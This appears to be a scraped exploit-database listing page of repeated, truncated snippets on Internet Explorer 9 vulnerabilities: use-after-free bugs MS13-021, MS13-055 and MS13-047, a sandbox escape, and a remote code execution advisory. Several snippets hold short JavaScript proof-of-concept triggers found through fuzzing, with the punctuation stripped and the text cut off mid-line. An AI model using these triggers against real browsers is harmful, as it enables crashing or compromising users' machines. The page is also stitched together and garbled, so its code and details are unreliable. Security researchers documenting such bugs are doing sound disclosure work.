Microsoft Internet Explorer 9 - IEFRAME CView::Ensure­Size Use-After-Free (MS13-021)

Microsoft Internet Explorer 9 - IEFRAME CView::Ensure­Size Use-After-Free MS13-021 var o­Element = document.get­Element­By­Id"ruby"; var o­Element = o­Element.parent­Node.remove­Childo­Element; document.write""; document.document­Element.offset­Top; set­Timeout"location.reload", 100; !-- Time-lin...

Microsoft Internet Explorer 9 IEFRAME CView::EnsureSize Use-After-Free

Since November I have been releasing details on all vulnerabilities I found that I have not released before. This is the 34th entry in the series. This information is available in more detail on my blog at http://blog.skylined.nl/20161216001.html. There you can find a repro that triggered this...

Microsoft Internet Explorer 9 - IEFRAME CView::Ensure­Size Use-After-Free (MS13-021)

var o­Element = document.get­Element­By­Id"ruby"; var o­Element = o­Element.parent­Node.remove­Childo­Element; document.write""; document.document­Element.offset­Top; set­Timeout"location.reload", 100; !-- Time-line Sometime in October 2012: This vulnerability was found through fuzzing. 29 Octobe...

Microsoft Internet Explorer 9 IEFRAME - CMarkup::Remove­Pointer­Pos Use-After-Free (MS13-055) Exploi

Exploit for windows platform in category dos / poc document.add­Event­Listener"load", function document.document­Element.remove­Nodetrue; , true; document.add­Event­Listener"DOMNode­Removed", function document.write""; , true; !-- Time-line Sometime in November 2012: This vulnerability was found...

Microsoft Internet Explorer 9 - IEFRAME CMarkup::Remove­Pointer­Pos Use-After-Free (MS13-055)

document.add­Event­Listener"load", function document.document­Element.remove­Nodetrue; , true; document.add­Event­Listener"DOMNode­Removed", function document.write""; , true; !-- Time-line Sometime in November 2012: This vulnerability was found through fuzzing. 11 November 2012: This vulnerabili...

Microsoft Internet Explorer 9 - IEFRAME CMarkup::Remove­Pointer­Pos Use-After-Free (MS13-055)

Microsoft Internet Explorer 9 - IEFRAME CMarkup::Remove­Pointer­Pos Use-After-Free MS13-055 document.add­Event­Listener"load", function document.document­Element.remove­Nodetrue; , true; document.add­Event­Listener"DOMNode­Removed", function document.write""; , true; !-- Time-line Sometime in...

Microsoft Internet Explorer 9 - IEFRAME CSelection­Interact­Button­Behavior::_Update­Button­Location Use-After-Free (MS13-047)

Microsoft Internet Explorer 9 - IEFRAME CSelection­Interact­Button­Behavior::Update­Button­Location Use-After-Free MS13-047 function go document.exec­Command'Select­All'; document.exec­Command'superscript'; set­Timeoutfunction o­Sup­Element=document.get­Elements­By­Tag­Name'sup'0;...

Microsoft Internet Explorer 9 - IEFRAME CSelection­Interact­Button­Behavior::_Update­Button­Location Use-After-Free (MS13-047)

function go document.exec­Command'Select­All'; document.exec­Command'superscript'; set­Timeoutfunction o­Sup­Element=document.get­Elements­By­Tag­Name'sup'0; o­Sup­Element.swap­Nodedocument.document­Element; , 0; !-- Time-line 27 September 2012: This vulnerability was found through fuzzing. 3...

Sandbox Escape: Internet Explorer Enhanced Protected Mode sandbox escape via a broker vulnerability

Internet Explorer Enhanced Protected Mode sandbox escape via a broker vulnerability =================================================================================== Full source code demonstrating the escape from IE's sandbox -- by launching a medium-integrity calc at login -- is attached with...

Microsoft Internet Explorer CSelectionInteractButtonBehavior Use-After-Free Remote Code Execution Vulnerability

This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Microsoft Internet Explorer. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the...